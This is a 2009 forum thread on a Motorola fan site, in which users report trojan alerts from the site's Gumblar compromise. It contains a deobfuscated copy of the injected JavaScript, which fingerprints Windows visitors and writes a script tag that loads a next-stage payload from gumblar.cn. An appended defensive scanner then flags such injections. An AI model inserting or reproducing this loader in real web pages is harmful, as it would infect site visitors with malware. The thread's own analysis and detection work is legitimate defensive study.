I recently logged in to this new ((looks and hosting)) motorolafans of ours.
I am using NORTON INTERNET SECURITY 2009.
Today my computer was attacked with a trojan virus just about every time I changed a topic on this website or logged in or logged out. Any activity resulted in a trojan attack.
I am safe cuz NIS09 detected the stuff...
Requesting all the users and admins to make a note of this thing.
A red screen used to stop me from visiting this website, but whenever I proceeded a trojan attack was detected on my system.
It's something because motorolafans is hosted by gumblar.cn.....
admins & mods
How risky is this, and is it really true that the new site is infected??? I'm using Symantec Anti Virus Corporate Edition, but I did not get any such alerts...
Install linux and enjoy the malware free world.
The worst virus you have on your PC is the one you call "OS".
If you use OpenEZX and want to support it, please click on "I USE THIS" on our ohloh project page: https://www.ohloh.net/projects/openezx
wyrm : LOL
stallman would be proud.
if [ $you = $emo ] then
kill $you
else
kill $emo
fi
Funny! This is how the script looks after I removed the obfuscation. It's a redirect; I wonder what value j gets on vulnerable machines. I tried to open the page at gumblar.cn, but since I don't know how to figure out a vulnerable j (no Windows here) I can't download the trojan.
Code:
var j = "", u = navigator.userAgent;
// Gate: Windows user agent, not "NT 6", no "miek=1" cookie, not already run on this page
if ((u.indexOf("Win") > 0) && (u.indexOf("NT 6") < 0) && (document.cookie.indexOf("miek=1") < 0) && (typeof(zrvzts) != typeof("A"))) {
    zrvzts = "A";
    // j is built from the script engine version numbers when window.ScriptEngine exists
    if (window.ScriptEngine)
        j = j + ScriptEngineMajorVersion() + ScriptEngineMinorVersion() + ScriptEngineBuildVersion() + j;
    // Writes a script tag that loads the next stage from the remote host
    document.write("<script src=//gumblar.cn/rss/?id="+j+"><\/script>");
}
Last edited by wyrm; 05-04-2009 at 08:49 AM. Reason: add code tags
And the script above is not the only infection on motorolafans.com; there are also other infections in templates/rt_mynxx_j15/js/rokmoomenu.js and templates/rt_mynxx_j15/js/mootools.bgiframe.js
At least they look like malware; it's obfuscated JavaScript.
fixed.
My JS interpreter was swallowing the "<script src=//gumblar.cn/rss/?id="+j+">" part, so I manually decoded it.
The other 2 infections I reported just cause JS errors here. This one from gumblar works, but it seems to be Windows/IE specific, as I can't download the trojan from this URL.
I googled for it, and it seems to have been spreading fast since 30/4; some people already downloaded the trojan, and it creates a "dwwin.exe" process on infected machines.
There are already 800+ domains infected with this. And just a minute ago when I tried to open gumblar.cn on Linux/Firefox (no antivirus software) I got a security alert; looks like the domain is already blacklisted (by whoever provides blacklisting for Firefox/Ubuntu).
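For anyone checking their own site files for the kind of injection discussed in this thread, here is a small scanner as an added example (not posted by any thread participant). The allow-listed host www.example.org, the sample file names and the 30% escape threshold are assumptions; the indicator strings are the ones visible in the decoded script above.

```javascript
// Added example: flag injected remote-script loaders in a site's own JS/HTML.
// Strings quoted in the thread's decoded script, used here as indicators.
const INDICATORS = ["gumblar.cn", "miek=1", "ScriptEngineBuildVersion"];

// Hosts of every <script src=...> tag found in the text, including tags
// built inside document.write() string literals.
function scriptHosts(source) {
  const re = /<script[^>]*\bsrc\s*=\s*["']?(?:https?:)?\/\/([^\/"'\s>?+]+)/gi;
  return Array.from(source.matchAll(re), (m) => m[1].toLowerCase());
}

// Share of the text made up of %XX escapes; packed payloads score high.
function escapeDensity(source) {
  const hits = source.match(/%[0-9a-f]{2}/gi) || [];
  return source.length ? (hits.length * 3) / source.length : 0;
}

// Returns a list of findings for one file's contents.
function scanSource(name, source, allowedHosts) {
  const findings = [];
  for (const host of scriptHosts(source)) {
    if (!allowedHosts.includes(host)) findings.push(`${name}: off-site script host ${host}`);
  }
  for (const ind of INDICATORS) {
    if (source.includes(ind)) findings.push(`${name}: indicator ${ind}`);
  }
  // Heuristic threshold (assumption): long text that is more than 30% escapes.
  if (source.length > 200 && escapeDensity(source) > 0.3) {
    findings.push(`${name}: dense %XX-escaped blob, review by hand`);
  }
  return findings;
}

// Constructed samples: a clean file, the loader line from the thread, a packed blob.
const SAMPLES = {
  "clean.js": 'document.write(\'<script src="//www.example.org/js/menu.js"><\\/script>\');',
  "loader.js": 'document.write("<script src=//gumblar.cn/rss/?id="+j+"><\\/script>");',
  "packed.js": "eval(unescape('" + "%41".repeat(100) + "'))",
};
for (const [name, text] of Object.entries(SAMPLES)) {
  console.log(name, scanSource(name, text, ["www.example.org"]));
}
```

To check a real site, feed each template and script file's contents to scanSource with the hosts the site legitimately loads scripts from, and compare any flagged file against a known-good copy.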